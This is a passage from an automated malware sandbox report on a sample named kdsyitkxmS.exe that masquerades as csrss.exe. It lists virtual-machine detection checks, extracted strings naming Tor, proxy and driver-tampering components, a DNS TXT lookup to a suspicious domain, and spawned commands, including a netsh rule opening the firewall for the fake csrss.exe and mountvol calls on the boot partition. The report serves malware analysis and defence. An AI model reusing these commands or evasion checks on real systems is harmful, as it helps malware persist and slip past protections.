        Source: C:\Users\user\Desktop\kdsyitkxmS.exeFile opened / queried: VBoxTrayIPC
        Source: C:\Users\user\Desktop\kdsyitkxmS.exeFile opened / queried: \pipe\VBoxTrayIPC
        Source: C:\Users\user\Desktop\kdsyitkxmS.exeFile opened / queried: VBoxMiniRdrDN
        Source: C:\Users\user\Desktop\kdsyitkxmS.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
        Source: C:\Users\user\Desktop\kdsyitkxmS.exeProcess information queried: ProcessInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: ... omitting accept-charsetafter EfiGuardallocfreetracebad allocCountbad record MACbad restart PCbad span statebtc.usebsv.comcert installedchecksum errorcontent-lengthcouldn't patchdata truncateddistributor_iddriver removederror responsefile too largefinalizer waitgcstoptheworldget uptime: %wgetprotobynamegot system PIDinitial serverinternal errorinvalid syntaxis a directorykey size wronglevel 2 haltedlevel 3 haltedmemprofileratemultipartfilesneed more datanil elem type!no module datano such deviceopen event: %wparse cert: %wprotocol errorread certs: %wread_frame_eofreflect.Value.remove app: %wruntime: full=runtime: want=s.allocCount= semaRoot queueserver.versionstack overflowstopm spinningstore64 failedsync.Cond.Waittext file busytime.Location(timeEndPeriodtoo many linkstoo many userstorrc filenameunexpected EOFunknown code: unknown error unknown methodunknown mode: unreachable: unsafe.PointeruserArenaStatevirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #window createdwork.full != 0xenservice.exezero parameter with GC prog
        Source: csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: RTP.exeSYSTEMROOT=SetFileTimeSignWritingSoft_DottedSystemDriveTTL expiredUninstallerVBoxServiceVMUSrvc.exeVariantInitVirtualFreeVirtualLockWSARecvFromWarang_CitiWhite_SpaceWinDefender[:^xdigit:]\dsefix.exeadditionalsalarm clockapplicationassistQueueauthoritiesbad addressbad argSizebad m valuebad messagebad timedivbitcoins.skbroken pipecampaign_idcgocall nilclobberfreeclosesocketcombase.dllcreated by crypt32.dlle2.keff.orgembedded/%sexternal IPfile existsfinal tokenfloat32nan2float64nan1float64nan2float64nan3gccheckmarkgeneralizedget CDN: %wgetpeernamegetsocknameglobalAllochttp2clienthttp2serverhttps_proxyi/o timeoutlocal errormSpanManualmethodargs(minTrigger=move %s: %wmswsock.dllnetpollInitnext servernil contextopera-proxyorannis.comout of syncparse errorprocess: %sreflect.SetreflectOffsretry-afterruntime: P runtime: g runtime: p scheddetailsechost.dllsecur32.dllservice: %sshell32.dllshort writestack tracestart proxytaskmgr.exetls: alert(tracealloc(traffic updunreachableuserenv.dllversion.dllversion=195wininet.dllwup_process (sensitive) B (
        Source: csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: entersyscallexit status failed to %wfound av: %sgcBitsArenasgcpacertracegetaddrinfowgot TI tokenguid_machineharddecommithost is downhttp2debug=1http2debug=2illegal seekinjector.exeinstall_dateinvalid baseinvalid pathinvalid portinvalid slotiphlpapi.dllkernel32.dllmachine_guidmadvdontneedmax-forwardsmheapSpecialmsftedit.dllmspanSpecialnetapi32.dllno such hostnon-existentnot pollableoleaut32.dllout of rangeparse PE: %wproxyconnectrandautoseedrecv_goaway_reflect.Copyreleasep: m=remote errorremoving appruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringstraffic/readtransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=worker mode wtsapi32.dll != sweepgen (default %q) (default %v) MB globals, MB) workers= called from flushedWork idlethreads= in host name is nil, not nStackRoots= out of range pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= %s/rawaddr/%s%s\%s\drivers, gp->status=, not pointer-bind-address-byte block (3814697265625: unknown pc Accept-RangesAuthorizationCLIENT_RANDOMCONNECTION-IDCONNECT_ERRORCache-ControlCertOpenStoreCoTaskMemFreeConnectServerContent-RangeDONT-FRAGMENTDeleteServiceDestroyWindowDistributorIDECDSAWithSHA1EnumProcessesExitWindowsExFQDN too longFindFirstFileFindNextFileWFindResourceWFreeAddrInfoWGC sweep waitGeoIPFile %s
        Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: DnsRecordListFreeENHANCE_YOUR_CALMEnumThreadWindowsFLE Standard TimeFailed DependencyGC assist markingGMT Standard TimeGTB Standard TimeGetCurrentProcessGetShortPathNameWHEADER_TABLE_SIZEHKEY_CLASSES_ROOTHKEY_CURRENT_USERHTTP_1_1_REQUIREDIf-Modified-SinceIsTokenRestrictedLookupAccountSidWMESSAGE-INTEGRITYMoved PermanentlyOld_North_ArabianOld_South_ArabianOther_ID_ContinuePython-urllib/2.5QueryWorkingSetExRESERVATION-TOKENReadProcessMemoryRegLoadMUIStringWRtlGetCurrentPebSafeArrayCopyDataSafeArrayCreateExSentence_TerminalSysAllocStringLenSystemFunction036Too Many RequestsTransfer-EncodingUnexpected escapeUnified_IdeographUnknown AttributeVGAuthService.exeWSAEnumProtocolsWWTSQueryUserTokenWrite after CloseWrong CredentialsX-Idempotency-Key\System32\drivers\\.\VBoxMiniRdrDN
        Source: csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: IP addressIsValidSidKeep-AliveKharoshthiLocalAllocLockFileExLogonUserWManichaeanMessage-IdNo ContentOld_ItalicOld_PermicOld_TurkicOpenEventWOpenMutexWOpenThreadOther_MathPOSTALCODEParseAddr(ParseFloatPhoenicianProcessingPulseEventRIPEMD-160RST_STREAMResetEventSHA256-RSASHA384-RSASHA512-RSASYSTEMROOTSaurashtraSecureBootSet-CookieShowWindowTor uptimeUser-AgentVMSrvc.exeWSACleanupWSASocketWWSAStartupWget/1.9.1Windows 10Windows 11[:^alnum:][:^alpha:][:^ascii:][:^blank:][:^cntrl:][:^digit:][:^graph:][:^lower:][:^print:][:^punct:][:^space:][:^upper:][:xdigit:]\\.\WinMon\patch.exe^{[\w-]+}$app_%d.txtatomicand8attr%d=%s cmd is nilcomplex128connectiondebug calldnsapi.dlldsefix.exedwmapi.dlle.keff.orgexecerrdotexitThreadexp masterfloat32nanfloat64nangetsockoptgoroutine http_proxyimage/avifimage/jpegimage/webpimpossibleindicationinvalid IPinvalidptrkeep-alivemSpanInUsemyhostnameno resultsnot a boolnot signednotifyListowner diedpowershellprl_cc.exeprofInsertres binderres masterresumptionrune <nil>runtime: gs.state = schedtracesemacquiresend stateset-cookiesetsockoptskipping: socks bindstackLarget.Kind == terminatedtext/plaintime.Date(time.Localtracefree(tracegc()
        Source: csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: GetActiveObjectGetAdaptersInfoGetCommTimeoutsGetCommandLineWGetFirmwareTypeGetProcessTimesGetSecurityInfoGetStartupInfoWGlobal\qtxp9g8wHanifi_RohingyaICE-CONTROLLINGIdempotency-KeyImpersonateSelfInstall failureIsWindowUnicodeIsWindowVisibleIsWow64Process2Length RequiredLoadLibraryExALoadLibraryExWNot ImplementedNtSuspendThreadOpenThreadTokenOther_LowercaseOther_UppercasePKCS1WithSHA256PKCS1WithSHA384PKCS1WithSHA512Partial ContentPostQuitMessageProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest TimeoutRtlDefaultNpAclSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockScheduledUpdateSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUnescaped quoteUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC]
        Source: csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: acceptactivechan<-closedcookiedirectdomainefenceempty exec: expectfamilygeoip6gopherhangupheaderinternip+netkilledlistenminutenetdnsnumberobjectoriginpopcntrdtscpreadatreasonremoverenamereturnrun-v3rune1 secondselectsendtoserversocketsocks socks5statusstringstructsweep sysmontelnettimersuint16uint32uint64unuseduptimevmhgfsvmxnetvpc-s3wup_hsxennetxensvcxenvdb %v=%v, (conn) (scan (scan) MB in Value> allocs dying= flags= len=%d locks= m->g0= nmsys= pad1= pad2= s=nil
        Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SafeArrayCopyDataSafeArrayCreateExSentence_TerminalSysAllocStringLenSystemFunction036Too Many RequestsTransfer-EncodingUnexpected escapeUnified_IdeographUnknown AttributeVGAuthService.exeWSAEnumProtocolsWWTSQueryUserTokenWrite after CloseWrong CredentialsX-Idempotency-Key\System32\drivers\\.\VBoxMiniRdrDN
        Source: csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: (MISSING)(unknown), newval=, oldval=, size = , tail = -07:00:00/api/cdn?/api/poll127.0.0.1244140625: status=AuthorityBassa_VahBhaiksukiClassINETCuneiformDiacriticEVEN-PORTExecQueryFindCloseForbiddenGetDIBitsHex_DigitInheritedInstMatchInstRune1InterfaceKhudawadiLocalFreeMalayalamMongolianMoveFileWNabataeanNot FoundOP_RETURNOSCaptionPalmyreneParseUintPatchTimePublisherReleaseDCRemoveAllSTUN addrSamaritanSee OtherSeptemberSundaneseSysnativeToo EarlyTrailer: TypeCNAMETypeHINFOTypeMINFOUse ProxyVBoxGuestVBoxMouseVBoxVideoWSASendToWednesdayWindows 7WriteFileZ07:00:00[%v = %d][:^word:][:alnum:][:alpha:][:ascii:][:blank:][:cntrl:][:digit:][:graph:][:lower:][:print:][:punct:][:space:][:upper:]_outboundatomicor8attributeb.ooze.ccbad indirbus errorchallengechan sendcomplex64connectexcopystackcsrss.exectxt != 0d.nx != 0dns,filesecdsa.netempty urlfiles,dnsfn.48.orgfodhelperfork/execfuncargs(gdi32.dllhchanLeafimage/gifimage/pnginittraceinterfaceinterruptinvalid nipv6-icmplocalhostmSpanDeadnew tokennil errorntdll.dllole32.dllomitemptyop_returnpanicwaitpatch.exepclmulqdqpreemptedprintableprofBlockprotocol proxy.exepsapi.dllquestionsreboot inrecover: reflect: rwxrwxrwxscavtracestackpoolsucceededtask %+v
        Source: csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: tracebackunderflowunhandleduninstallunzip Torunzip: %wurn:uuid:w3m/0.5.1wbufSpanswebsocketxenevtchn} stack=[ netGo = MB goal, flushGen for type gfreecnt= heapGoal= pages at ptrSize= runqsize= runqueue= s.base()= spinning= stopwait= stream=%d sweepgen sweepgen= targetpc= throwing= until pc=%!(NOVERB)%!Weekday(%s.uuid.%s%s|%s%s|%s(BADINDEX), bound = , limit = -noprofile-uninstall.localhost/dev/stdin/etc/hosts/show-eula12207031256103515625: parsing :authorityAdditionalBad varintCampaignIDCancelIoExChorasmianClassCHAOSClassCSNETConnectionContent-IdCreateFileCreatePipeDSA-SHA256DeprecatedDevanagariDnsQuery_WECDSA-SHA1END_STREAMERROR-CODEException GC forced
        Source: csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Not ImplementedNtSuspendThreadOpenThreadTokenOther_LowercaseOther_UppercasePKCS1WithSHA256PKCS1WithSHA384PKCS1WithSHA512Partial ContentPostQuitMessageProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest TimeoutRtlDefaultNpAclSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockScheduledUpdateSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUnescaped quoteUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC]
        Source: csrss.exe, 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: main.isRunningInsideVMWare
        Source: csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dll
        Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: &gt;&lt;'\'') = ) m=+Inf-Inf.bat.cmd.com.css.exe.gif.htm.jpg.mjs.pdf.png.svg.sys.xml0x%x1.1110803125: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomAtoiCDN=CESTChamDATADashDataDateEESTEULAEtagFromGOGCGoneHostJulyJuneLEAFLisuMiaoModiNZDTNZSTNameNewaPINGPOSTPathQEMUROOTSASTSTARSendStatTempThaiTypeUUID"%s"\rss\smb\u00
        Source: csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dllauthorizationbad flushGen bad map statebtc.cihar.combtc.xskyx.netcache-controlcontent-rangecouldn't polldalTLDpSugct?data is emptydouble unlockemail addressempty integerexchange fullfatal error: gethostbynamegetservbynamegzip, deflateif-none-matchignoring fileimage/svg+xmlinvalid ASN.1invalid UTF-8invalid base kernel32.dllkey expansionlame referrallast-modifiedlevel 3 resetload64 failedmaster secretmin too largename is emptynil stackbasenot a Float32open file: %wout of memoryparallels: %wparsing time powrprof.dllprl_tools.exeprofMemActiveprofMemFutureread EULA: %wrebooting nowruntime: seq=runtime: val=service stateset event: %wsigner is nilsocks connectsrmount errortimer expiredtraceStackTabtrailing dataunimplementedunsupported: user canceledvalue method virtualpc: %wxadd64 failedxchg64 failed}
        Source: csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: unixpacketunknown pcuser-agentuser32.dllvmusbmousevmware: %wws2_32.dll of size (targetpc= , plugin: ErrCode=%v KiB work, bytes ...
        Source: csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VersionVirtualWSARecvWSASend"%s" %stypes value=abortedalt -> answersany -> booleancharsetchunkedcmd.execonnectconsolecpu: %scpuprofderiveddriversexpiresfloat32float64forcegcgctracehead = http://invalidlog.txtlookup messageminpc= nil keynop -> number pacer: panic: readdirrefererrefreshrequestrunningserial:server=signal svc_versyscalltor.exetraileruintptrunknownupgradeversionvmmousevpcuhubwaitingwindowswsarecvwsasendwup_verxen: %wxennet6 bytes, data=%q etypes incr=%v is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= ping=%q pointer stack=[ status %!Month(%02d%02d%s %s:%d%s: 0x%x-cleanup2.5.4.102.5.4.112.5.4.1748828125?4#?'1#0AcceptExAcceptedAllocateAltitudeArmenianBAD RANKBalineseBopomofoBugineseCancelIoCherokeeClassANYConflictContinueCurveID(CyrillicDNS nameDSA-SHA1DecemberDefenderDeleteDCDuployanEULA.txtEqualSidEthiopicExtenderFebruaryFirewallFullPathGeorgianGetOEMCPGoStringGujaratiGurmukhiHTTP/1.1HTTP/2.0HiraganaInstFailInstRuneIsWindowJavaneseKatakanaKayah_LiLIFETIMELinear_ALinear_BLocationLsaCloseMD5+SHA1MahajaniNO_ERRORNO_PROXYNovemberOl_ChikiPRIORITYPROGRESSParseIntPersoconPhags_PaQuestionReadFileReceivedSETTINGSSHA1-RSASHA3-224SHA3-256SHA3-384SHA3-512SOFTWARESaturdaySetEventSystem32TagbanwaTai_ThamTai_VietThursdayTifinaghTypeAAAATypeAXFRUSERHASHUSERNAMEUgariticVBoxWddmWSAIoctlWinmonFSWmiPrvSE[::1]:53[:word:][signal \\.\HGFS\\.\vmcistack=[_NewEnum_gatewayacceptexaddress bad instcgocheckcontinuecs deadlockdefault:dial: %wdnsquerydurationeax ebp ebx ecx edi edx eflags eip embeddedesi esp execwaitexporterf is nilfinishedfs gs hijackedhttp/1.1https://if-matchif-rangeinfinityinjectorinvalid linkpathlocationmac_addrmountvolmsvmmoufno anodeno-cacheno_proxypollDescreadfromrecvfromreflect.runnableruntime.rwmutexRrwmutexWscavengeshutdownstrconv.taskkilltor_modetraceBuftrigger=unixgramunknown(usernamevmmemctlvmx_svgawalk: %wwsaioctlwuauservx509sha1yuio.top (forced) B exp.) B work ( blocked= in use)
        Source: csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: m=] = ] n=allgallparchasn1avx2basebindbitsbmi1bmi2boolcallcap cas1cas2cas3cas4cas5cas6chandatedeaddialdoneermsetagethmfailfileflagfromftpsfuncgziphosthourhttpicmpidleigmpint8itabjsonkindlinkmdnsnullopenpathpipepop3quitreadrootsbrkseeksid=sizesmtpsse3tag:tcp4texttruetypeudp4uintunixuuidvaryvmcixn-- -%s (at ...
        Source: csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: too many linkstoo many userstorrc filenameunexpected EOFunknown code: unknown error unknown methodunknown mode: unreachable: unsafe.PointeruserArenaStatevirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #window createdwork.full != 0xenservice.exezero parameter with GC prog
        Source: csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: , i = , not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.local.onion/%d-%s370000390625:31461<-chanAcceptAnswerArabicAugustBUTTONBasic BitBltBrahmiCANCELCONIN$CancelCarianChakmaCommonCookieCopticExpectFltMgrFormatFridayGOAWAYGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLengthLepchaLockedLycianLydianMondayPADDEDPcaSvcPragmaRejangSCHED STREETServerStringSundaySyriacTai_LeTangutTeluguThaanaTypeMXTypeNSUTC+12UTC+13UTC-02UTC-08UTC-09UTC-11VBoxSFWINDIRWanchoWinMonWinmonX25519Yezidi[]byte\??\%s\csrss\ufffd
        Source: csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: and got= max= ms, ptr tab= top=%s %q%s %s%s*%d%s/%s%s:%d%s=%s&#34;&#39;&amp;+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-0930.avif.html.jpeg.json.wasm.webp1.4.2156253.2.250001500025000350004500055000650512560015600278125:***@:path<nil>AdlamAprilBamumBatakBuhidCall ClassCountDograECDSAErrorFlagsFoundGetDCGreekHTTP/KhmerLatinLimbuLocalLstatMarchNONCENushuOghamOriyaOsageP-224P-256P-384P-521PGDSEREALMRangeRealmRunicSHA-1STermTakriTamilTypeAUSTARUUID=\u202] = (allowarrayatimebad nchdirchmodclosecsrssctimedeferfalsefaultfilesfloatgcinggeoipgnamegscanhchanhostshttpsimap2imap3imapsinit int16int32int64matchmheapmkdirmonthmtimentohspanicparsepgdsepop3sproxyrangermdirrouterune scav schedsdsetsleepslicesockssse41sse42ssse3sudogsweeptext/tls: torrctotaltraceuint8unameusageuser=utf-8valuevmusbvmx86write B -> Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...)
        Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 100-continue127.0.0.1:%d127.0.0.1:53152587890625762939453125AUTHENTICATEBidi_ControlCIDR addressCONTINUATIONCfgMgr32.dllCoCreateGuidCoInitializeContent TypeContent-TypeCookie.ValueCreateEventWCreateMutexWDeleteObjectECDSA-SHA256ECDSA-SHA384ECDSA-SHA512ErrUnknownPCFindNextFileGetAddrInfoWGetConsoleCPGetLastErrorGetLengthSidGetProcessIdGetStdHandleGetTempPathWGetUserGeoIDGlobalUnlockGlobal\csrssI'm a teapotInstAltMatchJoin_ControlLittleEndianLoadLibraryWLoadResourceLockResourceMax-ForwardsMeetei_MayekMime-VersionMulti-StatusNot ExtendedNot ModifiedNtCreateFileOpenServiceWPUSH_PROMISEPahawh_HmongRCodeRefusedRCodeSuccessReadConsoleWReleaseMutexReportEventWResumeThreadRevertToSelfRoInitializeS-1-5-32-544SERIALNUMBERSelectObjectServer ErrorSetEndOfFileSetErrorModeSetStdHandleSora_SompengSyloti_NagriSysStringLenThread32NextTor mode setTransmitFileUnauthorizedUnlockFileExVBoxTray.exeVariantClearVirtualAllocVirtualQueryWinmon32.sysWinmon64.sysWintrust.dllX-ImforwardsX-Powered-By[[:^ascii:]]\/(\d+)-(.*)\\.\WinMonFSabi mismatchadvapi32.dllaltmatch -> anynotnl -> bad flushGenbad g statusbad g0 stackbad recoverybad value %dbootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOcountry_codedse disableddumping heapend tracegc
        Source: C:\Users\user\Desktop\kdsyitkxmS.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\rss\csrss.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\rss\csrss.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\rss\csrss.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Performs DNS TXT record lookups
        Source: TrafficDNS traffic detected: queries for: ec87b504-92ea-4d22-a937-161700799581.uuid.duniadekho.bar
        Source: C:\Users\user\Desktop\kdsyitkxmS.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Users\user\Desktop\kdsyitkxmS.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Users\user\Desktop\kdsyitkxmS.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        Source: C:\Users\user\Desktop\kdsyitkxmS.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Users\user\Desktop\kdsyitkxmS.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Users\user\Desktop\kdsyitkxmS.exeProcess created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s
